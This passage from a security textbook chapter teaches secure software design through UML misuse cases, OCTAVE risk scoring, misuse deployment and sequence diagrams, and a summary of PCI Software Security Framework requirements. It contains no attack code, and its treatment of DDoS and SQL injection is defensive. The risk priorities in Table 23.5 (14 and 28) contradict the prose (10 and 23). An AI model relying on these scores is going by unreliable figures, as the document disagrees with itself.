Mitigation Point 1 (MP1) says that at Basic Path (BP) steps 2–3 we will use CAPTCHA to avoid a Distributed Denial of Service (DDOS) attack. A CAPTCHA requests that users enter the letters/numbers shown in an image on the form. CAPTCHA is used to maximize the possibility that the user is a real person, and not an automated program. CAPTCHA is useful for systems lacking multifactor or better-designed password systems, which otherwise automatically filter out automated attacks. In some cases, more extensive documentation is required, such as in the case where users may bypass our registration system and go straight for our documented

23.2  Evaluating Security Requirements

427

materials. Heavyweight Misuse Case Descriptions include additional information, such as: Extension points, Triggers, Preconditions, Assumptions, Mitigation guarantee, Related business rules, Stakeholders and threats, Terminology and explanations, Scope, Abstraction level and Precision level [16]. An example MisUse Case Description with more options is shown in Table 23.4, which describes how a user could bypass registration. This description includes a Precondition, Related Business Rule and Mitigation Guarantee.

23.2.4 Step 4: Analyze Risks After identifying threats, it is important to prioritize them. The fourth OCTAVE step is Analyze risks. In this step, SANS recommends considering the damage that may arise from loss of reputation and user productivity, and legal issues. We consider also the ease of attack and attack repetition, and the ease of detecting a successful penetration [17]. Similar to calculating organizational risk, the risk priority is calculated as Impact multiplied by Likelihood. In Table 23.5, both Impact and Likelihoods are rated on a 1–10 scale. Any threat which negatively affects the database is considered serious. Invalid Input affects only one user’s registration, and so has a low Table 23.4  Circumvent registration MisUse case Misuse case: circumvent registration Summary: Deviant client bypasses registration by going directly to the download web page. PreCondition: Client does Google search and finds link to download web page OR obtains link reference from a colleague Basic path: 1. DeviantClient obtains web reference from Google or friend. 2. DeviantClient uses web reference to download materials without registering. Mitigation points: MP1: Web page has no other web references. MP2: Registration is confirmed by an email response. MP3: Email response includes a dynamic web page with unique reference. This web page is accessible only if a key is provided during registration. Key expires in 1 week. Related business rule: Users must register to obtain materials. Mitigation guarantee: MP1 and MP3 solves Google search problems. MP3 could be used by friends for 1 week, which is acceptable.

Table 23.5  Risk analysis Threat DOS SQL attack (affects integrity, confidentiality) Invalid input Circumvent input

Impact 7 7

Likelihood 7 7

Priority = I*L 49 49

2 4

7 7

14 28

428

23  Planning for Secure Software Requirements and Design with UML

impact rating. The final priority scores are high (49) for Launch DOS and SQL Attack, moderate (23) for Circumvent Input, and low (10) for Invalid Input.

23.2.5 Step 5: Define Security Requirements The fifth and last OCTAVE step is Define security requirements. In this step, we address the threats by adding in security functions or features, using a Security Use Case Diagram. We can enhance our MisUse Case Diagrams to create the Security Use Case Diagram (retaining a copy of the original MisUse Case Diagram, before modifying it!) The security use case diagram indicates which security features will mitigate specific misuse cases. The security use case diagram may be implemented using either security use cases or security stereotypes. Security Use Case(s) are ovals describing a security feature or requirement, and are named in verb-noun or verb-adjective-noun form. Security Use Case notation is shown in Fig.  23.6. Basically, our original user feature, shown as a use case, a security use case which one or more misuse cases. Alternatively or additionally, we can include security stereotypes, which describe security features in carets: , such as is shown in the security use case oval in Fig.  23.6. Example stereotypes can include: or [4]. Stereotypes can be included in both use cases or security use cases. The optional letter following the description can indicate whether the security feature is a C=Class, O=Object, F=Function, U=Use case or D=Decision symbol. Figure 23.7 is an example Security Use Case Diagram mitigating our four main threats: Launch DOS, Attack SQL, Circumvent Registration and Enter Invalid Data misuse cases. Description of security features primarily is through stereotypes. The

Use Case: Verb-adjective-noun

Actor

Security Use Case

Misuse Case: Verb-adjective-noun Misuser Fig. 23.6  Depiction of a security use case

23.2  Evaluating Security Requirements

429

Circumvent Registration



Enter Client Info

Client

Enter invalid data

Deviant Client



Enter Feedback

Edit/delete client

Provider



Email Update

Launch DOS

Attacker Attack SQL

Fig. 23.7  Security use case diagram for registration system – draft version

stereotypes and really should be on each use case. However, certain use cases require specific defenses: “Enter Client Info” requires , and “Email Update” requires to defend against SQL attacks. If a DOS attack occurs, then we would recover by restoring via a backup or by editing registrations. Therefore, we add a security use case (dark red) “Edit/delete Client” as an option to “Launch DOS”. While the security here is improved, it appears unorganized and we really need some security features repeated across many use cases. “Enter Client Info” will include a check because there is no login-password procedure. We will  to prevent SQL attacks, redundant registration entries and other mistakes. Because DOS is a severe problem, an added Security Use Case is “Edit/Delete Client”, which enables the Administrator to delete suspicious registrations. With further consideration, we can think of more attacks and security requirements. For example, shouldn’t there be logins for all provider use cases, and CAPTCHA and email confirmation for all client accesses? Is it not possible that SQL attacks and invalid input can occur for any input? Unfortunately, this causes the diagram to become a bit unruly. Inheritance can compress our threats, by having specific threats point to generalized threats. Inheritance can also consolidate security stereotypes, by having specific use cases inherit from general use cases. Inheritance is implemented using an arrow with full arrowhead pointing to the general case. In Fig. 23.8, Launch DOS and Enter Client Information are both general use cases, and any security stereotypes are shared with specific use cases pointing to them.

430

23  Planning for Secure Software Requirements and Design with UML



Validate Input

Enter Feedback Client

Circumvent Registration



mitigate

Enter invalid registration

Deviant Client

Register

Attack SQL

Edit/delete client

Provider





Email Update

Launch DOS Attacker

Overflow DB

Send Continual Requests

Fig. 23.8  Security use case diagram – final version

These diagrams are very helpful to consider which security features address which misuse cases. Adding text to describe the relationships can also help, both to find additional errors and to communicate the security design. To further the design, it is possible to agree on Business Rules and/or prepare Security Use Case Descriptions for complex scenarios. With an agile style, it is possible to proceed with preparing security stories, at this stage. It may be useful to include in the Security Requirements the associated Business Rules [14]: 1. Users cannot access the web pages without registering their emails into the system; 2. Email registrations shall be accurate; 3. The database with user emails shall not be easily broken into, requiring 2-factor authentication; 4. It is difficult to circumvent the registration process; 5. The registration system is near-immune to DDOS attacks; and 6. Provider email notifications and obvious attacks are logged and emailed to the administrator. If further design is desired for complex scenarios, Security Use Case Descriptions can be prepared. Table 23.6 shows the Validate Input Security Use Case, which is patterned after a regular Use Case. The Basic Path describes the overall functions of verifying CAPTCHA, validating input, and checking for duplicate registration entries. The Postcondition describes the attacks that are mitigated as part of this security function. This example has given an overview of the different steps and activities that make up the OCTAVE risk analysis through using MisUse Cases. A Requirements

23.2  Evaluating Security Requirements

431

Table 23.6  Validate security use case Security use case: Validate input Summary: This validates all client and provider entries on a per-field basis Precondition: A name, email, job function are provided. Basic path: 1. For each valid field: name, email, job, password (if included) 2.  The system checks for valid characters, to prevent SQL injection. 3.  The system checks for valid name, email, password and job function 4.  Log both attacks and successful registrations 5. If email is new to database 6.  Add record to database 7. The system returns “new”, “existing” or “failure” to calling routine. Postconditions: The input has been checked for bot attempt, SQL injection, and validity. Attacks and successful access are logged.

Inspection provides feedback from the customer, experienced security/design staff and/or auditors, to avoid implementation problems. Errors found and fixed at this stage save re-development time and the high costs of security breaches, following deployment. Also, just as code can be reused, design documentation can similarly be reused.

23.2.6 Specify Reliability, Robustness The availability requirements are not severe for this registration system. However, for mission critical systems, such as air transportation or defense software, reliability may be a life or death concern. Reliability can be defined as software operating as expected, for a defined duration of time and within defined conditions [18]. Reliability engineers calculate the failure rate of all mission critical components of a system, to determine the allowable tolerance (or intolerance) for failure. Reliability requirement statistics are defined in the contract and requirements, and then must be implemented in later development stages. Metrics that may be specified in a contract, project plan, reliability plan and/or the non-functional requirements section within the Requirements document may include [18]: • Number of defects in software: failure rate data, measured during test and deployment; or defect density, measured as the number of defects per thousand lines of code. • Total test time/performance: total test time, total CPU time during testing, and failure execution time. • Defect elimination metrics: defects found per development stage: A mature organization can predict, for a given size of code, how many defects should be found per development stage inspection and testing. If expected defects are not found, quality control is probably lacking and the project is at risk of a high defect rate.

432

23  Planning for Secure Software Requirements and Design with UML

These metrics may be required to be only provided, and/or to achieve a specified level of reliability.

23.3 Analysis/Design The purpose of the Analysis/Design Stage is to determine how the software will be built to fulfill the features specified during the Requirements Stage [24]. During design, the eventual product is taking shape and details in the implementation are becoming known. Considering our Registration System case, new concerns will naturally arise during Design related to a web service implementation. Within UML, two aspects of design include [11]: 1. Static Model: These diagrams show the structure of the software, including classes, components and subsystems. 2. Dynamic Model: These diagrams describe the system behavior, including how each Use Case is executed.

23.3.1 Static Model In large standardized systems, such as Open Group’s Common Data Security Architecture (CDSAv2), security may be layered as shown in Fig. 23.9 [19]. The application issues requests, possibly through middleware (or data communication services) to the Common Security Services Manager Application Programming Interface (API). Encapsulated within the security manager, a series of security service provider modules are provided, including the features: authorization, digital certificates, encryption and key management, integrity services, and other services which can be configured in. API interfaces are clearly specified. This

Application Layered Services and Middleware Common Security Services Manager Application Programming Interface System Service Provider Modules Cryptographic Trust Policy Authorization Certificate Data Storage Module Services Services Computation Library Library Directory Provider Services Services Services Services Embedded Add-in Key Directory Signed Elective Object Integrity Module Services Manifest Module Identifiers for Services Structure and Manager Certificate Library Administration Library Modules

Fig. 23.9  Open Group’s Common Data Security Architecture Version 2 [19]

23.3 Analysis/Design

433

Fig. 23.10  Documenting security packages

implementation takes advantage of software reuse and reliability. Although this is an elegant interface, unfortunately, the free Open Group library of code is no longer supported. Regardless of the actual architecture used, during Static Modeling a blueprint of the new service is developed. Subsystems are shown as folders in UML. Figure 23.10 shows how a CAPTCHA and Sanitizer security packages the Registration Subsystem. The purpose of the Sanitizer package is to validate (or sanitize) user input. Security packages may be labelled with a label and name, a showing the priority calculated during Requirements, and one or more , which describe the threat(s) that the package defends against [20]. At a more detailed (drill-down) level, each subsystem could be diagramed using a class diagram, showing the internal classes of the subsystem. An alternative method of describing security implementations is to use above package and/or class names [4]. Often, these diagrams may be automatically generated by development tools. An important aspect of class-level design is security design patterns. A selection of classes, and their purposes, services and relationships to other classes is documented in research papers demonstrating design patterns [25]. Security patterns are shown as UML class diagrams, with text explanation. Investigation of these designs can help shorten the time to development and improve the quality of finished products. Mid-level BSIMM maturity levels recommend using ‘secure-by-design’ software libraries and services, which are already available to be readily reused. Higher BSIMM maturity levels recommend forming a review committee to find, develop, and publish secure design patterns [26]. (The topic of design patterns would require an additional chapter in itself, so the topic is only introduced here.) With the Internet, software has become distributed in its deployment and/or use. A Deployment Diagram shows where the various components of the software will reside (e.g., on client or server) [11]. A MisUse Deployment Diagram or MDD

434

23  Planning for Secure Software Requirements and Design with UML

Client

Firewall

Registration Server

Node2

Node3

Node1

Email Response

Packet Filter

Dynamic Webpage Authorization

Event Logger Invalid Registerer, Impersonator

DDOS Attacker

Requester of Doc Root, Googler

Sanitizer

CAPTCHA

SQL Attacker

DOS Attacker

Fig. 23.11  A MisUse Deployment Diagram [14]

(Fig. 23.11) in addition shows where security components reside, and the attacks that those security components mitigate. This single diagram is useful in that it easily shows the concrete security deployment, including how attacks can be mitigated across systems [14]. For example, input validation must occur to combat SQL attacks. But if this validation occurs only on the client side, security is inadequate. Therefore, the location of security code is as important as its existence. In Fig. 23.11, the Sanitizer is on the Server side, protecting against an SQL Attack there. In an MDD, Misusers represent general attack types. Packages are shown as folders to represent application subsystems, and as red boxes to represent security components or packages. The attack name is assigned to the misuser. Figure 23.11 was drawn with Microsoft Visio as a UML Deployment Diagram and serves well as an initial diagram. Figure 23.12 adds security stereotypes for better explanation of the provided security services. Security components for the Register System are described as follows [14]: • Dynamic web pages: Ensures documents are available only at download time. Server-side programs enforce registration, by requiring users to register their email address. • Email Response: Users obtain the Dynamic web page via email following registration. • CAPTCHA: CAPTCHA helps to mitigate automated Distributed Denial of Service attacks. • Authorization: Used to verify Provider’s login/passwords.

23.3 Analysis/Design

435

Client

Firewall

Registration Server

Node2

Node3

Node1

Email Response

Packet Filter

Dynamic Webpage

Authorization

Event Logger

Invalid Registerer, Impersonator

DDOS Attacker

Requester of Doc Root, Googler

Sanitizer

CAPTCHA

SQL Attacker

DOS Attacker

Fig. 23.12  Misuse Deployment Diagram with security stereotypes

• Input sanitization and validation: A server-side program allows all user input from the registration form to be sanitized of input attacks such as cross-site scripts or SQL injections. The program also validates all incoming data. • Event logging: A server-side program logs any event needing to be tracked, thus providing a record of activity at the web site. Each system module has the ability to write information to the system log. The amount of logging is configurable.

23.3.2 Dynamic Model The dynamic model may be used to design complex behavior the classes, components and subsystems defined in the Static Model. The two types of diagrams we will review are the Sequence Diagram and State Diagram. 23.3.2.1 Sequence Diagrams Chapter 21 Software Threats uses ladder diagrams to clearly show how attacks may occur between different entities. These ladder diagrams are drawn similar to UML sequence diagrams, and in fact some were drawn with the UML sequence diagram tool. UML sequence diagrams show how objects (or class instances) interact with other objects in order to fulfill a use case [11]. Figure 23.13 is an example Sequence Diagram for the Register Use Case. At the top of the diagram are objects, shown as

436

23  Planning for Secure Software Requirements and Design with UML

Fig. 23.13  MisSequence diagram for the register use case model [11]

actor instances or as rectangles listing object names. Theoretically, objects send messages to other objects, which are shown as labelled arrows between the objects. In practice, messages are method calls or packet transmissions, and the labels represent the method or packet name. Figure 23.13 shows packet transmissions between the actors on the client side, and the Register and Download software on the Server side [14]; each arrow represents one packet transmission. In Fig. 23.13, a LegalClient requests the materials using the Request_Info message sent to the Register program. The server’s Register program replies with the Request_Register_Form, which the LegalClient completes and sends in as a completed Submit_Register_CAPTCHA_Form. The form data is received by Register, which sanitizes and validates the form data including verifying the CAPTCHA input. Once the input is validated, Register inserts LegalClient’s registration data into the database, together with a newly generated unique key. Register then sends an email to LegalClient’s email address, shown in Fig. 23.13 as the message Email_ link_and_key. This email contains a link back to the dissemination web site. The link includes an appended unique access key. When the link is clicked by the user, an HTTP_Request_with_Key message is sent to the Download program. The key contained in the packet identifies the user as having previously registered with the web site and serves as a type of password

23.3 Analysis/Design

437

for temporary access to the downloadable files. Thus, without a valid email, no download occurs. When the Download program receives the key or temporary password, it generates a Dynamic_html_page_with_links for LegalClient. The downloadable files are provided temporarily during the web access and deleted soon after. This minimizes the possibility of non-registrants obtaining the downloadable files. The dynamic web page ensures that search engines will not ordinarily provide access to this page. While Sequence Diagrams generally shows normally executing logic, Mis-­ Sequence Diagrams also show attack handling logic [21]. Attacks are shown as conditional logic, which demonstrate how attacks are received and handled. The Parallel box at the bottom of the diagram shows the normal occurrence on top half of the Parallel box, and the attack in the bottom half, below the dashed line. The Parallel label indicates that the two activities can occur together. In this attack, LegalClient passes the email with link and key to their friend, Illegal:Client, during the one week duration the key is valid. This is shown as the Email_link_and_key message sent from LegalClient to Illegal:Client, and Illegal:Client’s subsequent access to the downloadable data. We have no easy fix to this, but some risk is acceptable in the interest of getting the system up quickly. Similar to other UML diagrams, it is possible to write security stereotypes above object names [4]. We might have included on the legal client object and above the download object. 23.3.2.2 State Transition Diagrams State Transition Diagrams (STDs or State Diagrams) can ensure integrity of real-­ time processing, thus avoiding incorrect actions when receiving a right input at the wrong time [22]. For example, an ATM money machine will not give you money whenever you ask for it; you must slide your card and enter your PIN first, then you can input the amount of money you would like. Thus, STDs show how one class/ object should behave, depending on what state that object is in. STDs can ensure that software retains the proper order of processing, recognizes out-of-sequence steps, and can change behavior based on time or past history. In other words, a well-­ designed STD can ensure that an object behaves properly in all scenarios. Figure 23.14 is an example STD. STDs have states, shown as rectangles with rounded edges, and transitions, shown as labelled arrows. Any object can only be in one state at a time. The object transitions from one state to another when any of its outgoing transitions is received or becomes true; then it transitions to the state where the arrow points. Each state is split into two parts. The top part contains the state name. The bottom part shows the processing that occurs in the state, and which does not cause a transition to a different state. This bottom part describes Events that may be received, and how they are handled. In Fig. 23.14, events include entry/ and do/. The entry/ event indicates that this processing should occur once, on entry to the state. The do/ text indicates that this processing should occur whenever the described

438

23  Planning for Secure Software Requirements and Design with UML

Fig. 23.14  State transition diagram for client

event occurs: in Fig. 23.13, when a HTTP_Request_with_Key is received. In other words, with do/ the described processing can occur multiple times; once per event. Figure 23.14 is a state diagram for the state of a Client. The first state, Registered, is entered upon receipt of a validated Submit_Register_CAPTCHA_form. On entry/ to the Registered state, the Register program saves the registration information, and generates the email with associated key for LegalClient. This is transmitted to LegalClient in the Email_Link_and_Key message, which then sets the new state of LegalClient to Downloadable. In the Downloadable state, the Download program validates the key in the database before sending the Dynamic_HTML_page_with_ links. LegalClient stays in the Downloadable state until 1  week expires. Then LegalClient transitions to the Download_Expired state. The single remaining transition that can get LegalClient back to the Downloadable state, is if the Register program gets another Email_Link_and_Key message from LegalClient. This state diagram ensures legal transactions and processing for any Client object. The last step is the inspection for the Design. Security experts can help find security flaws before they are coded and deployed. When evaluating a design, multiple heads are better than one. Consider that multiple heads will be attacking your software, and they only need to find one strong vulnerability.

23.4  Example Secure Design: PCI Software Security Framework

439

23.4 Example Secure Design: PCI Software Security Framework The Payment Card Industry certifies software that handle payment card transaction, based on their framework: Software Security Framework: Secure Software Requirements and Assessment Procedures [9]. PCI Security Standards Council has designed requirements that must go into the software, and these design requirements provide an overview of their vision of security features required to protect sensitive information. This section briefly outlines those requirements, although for full details, the reader is recommended to this freely available document. There are four required areas defined by this standard, as well as two modules specific to particular configurations: Module A and B (not discussed). This document reviews the four required areas. The first area, Minimize the Attack Surface, focuses on risk assessment and prioritization. The first part of any risk assessment is to inventory the assets: the card data elements and transactions processed, as well as defining their information security CIA classification. Assets’ internal environment must be documented, including the process of how and where each asset is processed (main memory, RAM, flash media vs. disk), their duration of storage, and how and where encryption and third-party software is used. Known vulnerabilities, including those listed in a public vulnerability database, must be mitigated. PCI takes a special interest on the installation process of the software: any default passwords and accounts and required environmental files must ensure that the process is well-documented and secured both during and after installation. As part of the configuration, any unnecessary services or ports should be removed, including in third-party software. The installation process should be clear on certificate and key installation, replace any default accounts and passwords, define each configuration requirement, and ensure that transaction processing does not begin until fully, properly configured. Authentication and access control shall implement least privilege (or minimum necessary) for the required roles: e.g., administrators can change configurations but not access sensitive user data. Configurable access control can enable privileges to be tailored to specific roles and persons. Both access control and data storage shall also be restricted to business purpose: e.g., if there is no need to store data, data shall not be stored. Retention of secure information should be as short as possible; after a transaction has been processed, its data should be explicitly cleared to prevent further use or exposure. During any required storage or transmission, strong encryption shall be used, and any keys shall be expunged as soon as possible thereafter. It is important to delete from all areas where sensitive data may reside: swap space, partitions, and log files; and to prevent side channel leaks, whether in hardware (cache, screen, keyboard) or software (error messages, logs, and memory dumps). The second area, Software Protection Mechanisms, focuses on features related to authentication, encryption and integrity. Risk assessment defines the attacks that

440

23  Planning for Secure Software Requirements and Design with UML

need to be addressed, including attacks on passwords, encryption, and input. A process flow diagram details where information is input, processed, and sent, including any storage devices, network segments, URLs, static IPs, and related channels, such as environmental or configuration data and authentication flows. Authentication and access control for specific roles and types of access (local versus remote) should be based on risk assessment. Higher levels of security are required for roles such as system administration, remote access, and roles with access to sensitive data. Roles requiring higher security would need multifactor authentication, and all users should require unique logins. Password credentials should be protected and sufficiently complex to prevent guessing, leaking or bypass. For example, biometric devices should not be fooled by a forged copy. Access control models shall protect based on specific roles or identities, with permissions based on allowable access times, enabled attributes, and dynamic decisions based on recent history. Sensitive data transmitted or stored persistently must be protected by standard encryption and in some cases, integrity controls. The first requirement is to review all places the data is stored or transmitted, including log files, third-party software and operating system(s). Encrypted sensitive data should be protected by appropriate key-management processes, or a one-way hash or one-time pad that renders the data unreadable. (A one-time pad is a randomly generated number used once to encrypt and decrypt one transaction.) Encryption algorithms must meet accepted national or international standards, such as NIST, ANSI, ISO or EMVCo. Integrity hash algorithms should also be protected via a quality random number generator, strong salt, and a reputation for collision resistance. It is important to thoroughly understand key management processes, to ensure that all parts of this process are strong. One rule is that separate keys must be used for key storage, data encryption, authentication, and even different transactions. The encryption used for key storage must be at least as strong as for data encryption, and these two keys must be stored separately. Encryption used for key delivery must be at least as strong as the encryption key being delivered. New keys shall not be generated from old keys, where the generation process could be reversible. An inventory of keys is maintained, including key name, type/length, purpose, location and expiration date (including through third-party software). All secret keys must be at least 128 bits or longer. Keys shall expire at the end of their crypto-­ period and shall be retired or replaced thereafter. It is recommended to use a two-­ part key storage for certain keys (e.g., private keys) so that knowledge of both parts are required to identify the full key. Key secrecy is heavily dependent on the quality of the random number generator, its configuration and initialization. Random number generators are defined by their entropy, which defines the size of the period before random numbers repeat. Entropy is also affected by the initialization seed. This PCI standard briefly discusses issues with using passphrases for generating keys and how random number generators are to be tested for sufficiency.

23.4  Example Secure Design: PCI Software Security Framework

441

The third area, Secure Software Operations, focuses on logs tracking user actions and incidents. Many events need to be logged, including access to sensitive data and changes in configuration of sensitive functions (encryption, logging, authentication, privilege escalation). Logging needs to clearly define the action taken, who did it, when they did it, and impacted critical assets. Integrity of the logs is important. Log data should include integrity checks to ensure completeness and accuracy, but also to ensure that the log file never gets overwritten upon restart, overflow or other failures. A main function of logs is recognition of attacks, such as password guessing and changes in configuration following installation. Input rate limiting (or slowing down transaction processing) can control password or key input brute force attacks. In addition, integrity checks on critical data and software should be checked at least every 36 hours, and any failures recorded. The fourth area, Secure Software Lifecycle Management, is concerned with the entire software development lifecycle, from risk assessment through deployment. Risk management starts the process to address and mitigate all potential threats and vulnerabilities, also detailing their potential impacts. Third party software can provide trusted software components offering an assurance of stability, but all such software must be carefully evaluated, minimized to required functionality, and if necessary, remediated. Then, automated testing (for vulnerability and security testing) results in a bug bar threshold that categorizes and prioritizes defects for rapid or eventual remediation. During and after deployment, patching and managing software updates repairs issues in commercial software. Such updates must be delivered using secured communications (e.g., TLS), with integrity hashing or digitally signed certificates for integrity and authenticity. Release notes can provide hash values to assure software legitimacy, specify the purpose of the fix(es) with installation directions, and discuss workarounds for defects not yet fixed. All release notes and user documentation must clearly state the version to which the documentation applies. Users have methods to view the security status, including which patches are applied and functional, and whether the system considers itself fully secured. Auditors will examine documentation, confirm code contents, and analyze products using forensic software, memory dumps, and protocol sniffers to ensure that these requirements are met. This requires ensuring that all environmental/configuration files are encrypted, that no reduction in the strong encryption can be negotiated during transmission. Documentation must clearly and accurately describe all setup requirements (e.g., cryptography libraries, random number generators, and environmental files), all configuration options (including setting account passwords and permissions, enabling/disabling features) and how to enable a secure state and track its status. This abbreviated outline is not a full checklist of requirements; for the full set of details, please see the PCI Software Security Framework: Secure Software Requirements and Assessment Procedures [9].

442

23  Planning for Secure Software Requirements and Design with UML

23.5 Questions and Problems 1. Vocabulary. Match each meaning with the correct word. OCTAVE Layering Trust Modularity Least privilege

State diagram Misuse case Threat tree Open design Encapsulation

Economy of mechanism Security use case Misuse case diagram Missequence diagram Least astonishment

Misuse case description Misuse deployment diagram Security use case diagram Psychological acceptability Least common mechanism

(a) This security requirements process analyzes assets, goals, threats and risks. (b) Principle: It is important to separate and isolate services from each other, by not sharing devices; also known as minimization. (c) This programming principle hides class attributes and complex logic behind a class method interface. (d) A concept stating that to transact, a user must feel they are working with a safe organization, safe network, and safe computer systems. (e) Principle: if an attacker breaks through one control, they are stopped by a series of other controls (f) Principle: Security implementations should not make a resource more difficult to use than an implementation without security. (g) Principle: The system must be strong enough that even when the attacker knows the code, they cannot break in. (h) Principle: Security mechanisms should be understandable to users and work effectively within users’ activities. (i) Principle: Security mechanisms should be shared between software systems, to enable optimizing and simplicity. (j) A UML diagram that shows the implementation of attacks and attack handling logic, by diagramming messages (calls or packets) between objects or subsystems. (k) A UML diagram that shows where security components reside and the attacks that the security components mitigate. (l) This requirements diagram displays attackers as stick figures and attacks as black ovals. (m) In a use case diagram, this use case oval is the security action that mitigates the attack. (n) This table and text describe an attack in a numbered step-by-step description. 2. Case Study: For your selected case study industry, consider application-level threats (e.g., social engineering, fraud), in addition to software-level threats. Then prepare the following diagrams (Examples are shown throughout this chapter).  This can be done using Microsoft Visio, by selecting “UML Diagram ->

23.5  Questions and Problems

443

More Shapes -> Software and Database -> Software -> . Or you may more simply search for “Use Case Diagram” at the search edit screen. (a) Risk Analysis Table: The risk analysis process includes: defining assets, naming threats to assets, rating the threats and likelihoods, and prioritizing the threats. View table 23.5 and adjust for your application. (b) Misuse Case Diagram: Prepare a Misuse Case Diagram to document potential attacks to your organization. Include valid features: use cases, users, as well as security attacks and vulnerabilities: misusers, misuse cases, with relationships. If using MS Visio, start with a UML Use Case Diagram, then change the colors of misuse cases. Save off your Misuse Case Diagram. (c) Security Use Case Diagram: This diagram shows how security use cases overcome misuse cases. Start with your Misuse Case Diagram, but save it off as your Security Use Case Diagram before modifying the diagram. (d) Misuse Deployment Diagram: This diagram includes with client and server systems (boxes), and demonstrates where security packages are used to defend against attacks. If using MS Visio, start with a UML Deployment Diagram. (e) Activity Diagram: Display the logic for the mainstream processing, including writing/reading to data (rectangles), processes (rounded edges), and conditions for branches (diamonds). If using MS Visio, start off with a Basic Flowchart diagram or search for “Activity Diagram”. (f) Threat Tree: For your selected case study industry, prepare a Threat Tree showing a hierarchy of threats to your industry. If using MS Visio, start off with a Brainstorming Diagram. 3. Secure Software Audit: For a PCI DSS incident response case for a large breach, what documentation should an auditor look for to confirm that the software design does follow PCI DSS Software Security Framework requirements, as listed in this chapter, for the following sections: (a) Minimize the Attack Surface (b) Software Protection Mechanisms (c) Secure Software Operations (d) Secure Software Lifecycle Management 4. Legal case: For breached credit card data, a PCI DSS inspector arrives to determine whether the PCI DSS Software Security Framework, Minimize the Attack Surface area is properly implemented. A threat tree exists and is identical for similar projects, but is not fully implemented. An access control table shows which use cases exist for roles such as cashier, manager and administrator. However, the access control table is not dynamically configurable. An information security design exists, showing which data is stored and transmitted and the required standard for confidential protection. No additional documentation except code exists. It is argued that a bug bar standard exists, and outstanding flaws are below their release standard. What should the PCI DSS inspector

444

23  Planning for Secure Software Requirements and Design with UML

inspect next and recommend for remediation? Provide detailed recommendations and arguments outlining your decision.

23.5.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study, Security Workbook and Health First Requirements Document should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Note that the Optional Extensions listed as case studies below are extensions to the named case study. It is recommended that you perform the original case study, or at least read the case study all the way through, before designing the Optional Extensions. Case study Update requirements document to include segregation of duties Fraud: Combatting social engineering optional extension: Computerizing the disclosure forms Planning for incident response Optional: Software design for incident detection Defining security metrics Optional: Designing metrics for the requirements doc Software requirements: Extending UML with MisUse cases HIPAA: Including privacy rule adherence to requirements document Application controls: Extending requirements preparation by planning for HIPAA security rule

Health first case study √ √ √ √

Other resources Health first requirements document Health first requirements document HIPAA slides or notes Health first requirements document Health first requirements document



HIPAA slides or notes



HIPAA slides or notes requirements document HIPAA slides or notes requirements document



References 1. 2011 CWE/SANS top 25: monster mitigations. http://cwe.mitre.org/19/mitigations.html. Accessed 15 Nov 2014 2. Bryant E, Early J, Gopalakrishna R, Roth G, Spafford EH, Watson K, Williams P, Yost S (2003) Poly2 paradigm: a secure network service architecture. Proc. 19th Annual Computer Security Applications Conference (ACSAC 2003), IEEE, 10 p 3. Smith RE (2012) A contemporary look at Saltzer and Schroeder’s 1975 design principles. November/December 2012, IEEE Computer and Reliability Societies

References

445

4. Mohsin M, Khan MU (2019) UML-SR: a novel security requirements specification language. 2019 IEEE 19th International Conf. on Software Quality, Reliability and Security (QRS), IEEE pp. 342–348 5. Tarala J, Tarala KK (2015) Open threat taxonomy, version 1.1. Enclave Security, Venice Florida, pp 1–15 6. Deitel HM, Deitel PJ (2002) Java: how to program, 4th edn. Prentice Hall 7. Horstmann (2003) Computing concepts with C++ essentials, 3rd edn. Wiley, New York 8. PCI (2021) Payment Card Industry (PCI) Software Security Framework: Secure Software Lifecycle Requirements and Assessment Procedures, v. 1.1, Feb 2021. www.pcisecuritystandards.org 9. PCI Security Standards Council (2021) Payment Card Industry (PCI) Software Security Framework: Secure Software Requirements and Assessment Procedures, Version 1.1, Apr 2021, www.pcisecuritystandards.org 10. SAFECode (2011) Fundamental practices for secure software development, 2nd edn. Software Assurance Forum for Excellence in Code. 8 February 2011, www.safecode.org, pp 1–56 11. Arlow J, Neustadt I (2005) UML2 and the unified process, 2nd edn. Pearson Education Inc., Upper Saddle River 12. Woody C, Alberts C (2007) Considering operational security risk during system development. IEEE Secur Priv 5(1):30–35 13. Sindre G, Opdahl AL (2005) Eliciting security requirements by misuse cases. Requir Eng 10(1):120–131, Springer, New York 14. Lincke S, Knautz T, Lowery M (2012) Designing system security with UML misuse deployment diagrams. In: IEEE international workshop on information assurance (IA2012). IEEE 15. Tondel IA, Jensen J, Rostad L (2010) Combining misuse cases with attack trees and security activity models. In: International conference on availability, reliability and security, 15–18 Feb 2010, pp 438–445 16. Sindre G, Opdahl AL (2008) Misuse cases for identifying system dependability threats. J Inf Priv Secur 4(2):3–22, Taylor & Francis Online, http://www.tandfonline.com 17. SANS (2009) Practical risk analysis and threat modeling spreadsheet. http://cyber-­defense. sans.org/blog/2009/07/11/practical-­risk-­analysis-­spreadsheet. Accessed 6 Dec 2014 18. Payne RS (2013) A practical approach to software reliability for army systems. In: 2013 Proceedings of the annual reliability and maintainability symposium (RAMS). IEEE, pp 1–5 19. Open Group (2020) Security Forum: CDSA (Common Data Security Architecture), Taken from: http://www.opengroup.org/security/l2-­cdsa.htm. Accessed 26 Jan 2023 20. Peterson MJ, Bowles JB, Eastman CM (2006) UMLpac: an approach for integrating security into UML class design. In: Proc. IEEE SoutheastCon, IEEE. pp 267–272 21. Whittle J, Wijesekera D, Hartong M (2008) Executable misuse cases for modeling security concerns. In: ACM/IEEE 30th international conference on software engineering (ICSE 08), pp 121–130 22. Kong J, Xu D (2008) A UML-based framework for design and analysis of dependable software. In: 32nd IEEE international computer software and applications (COMPSAC ’08). IEEE, pp 28–31 23. Christey S (2011) 2011 CWE/SANS top 25 most dangerous software errors. 13 September 2011. http://cwe.mitre.org/19 24. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New  York, pp 1094–1111 25. Washizaki H (2017) Security Patterns: Research Direction, Metamodel, Application and Verification. 2017 International Workshop on Big Data and Information Security (IWBIS). IEEE, 2017 26. BSIMM (2020) Building Security In Maturity Model, version 11, Sept 2020 27. Adam Shostack, “STRIDE,” in Threat Modeling: Designing for Security , Wiley, 2014, pp.61–86.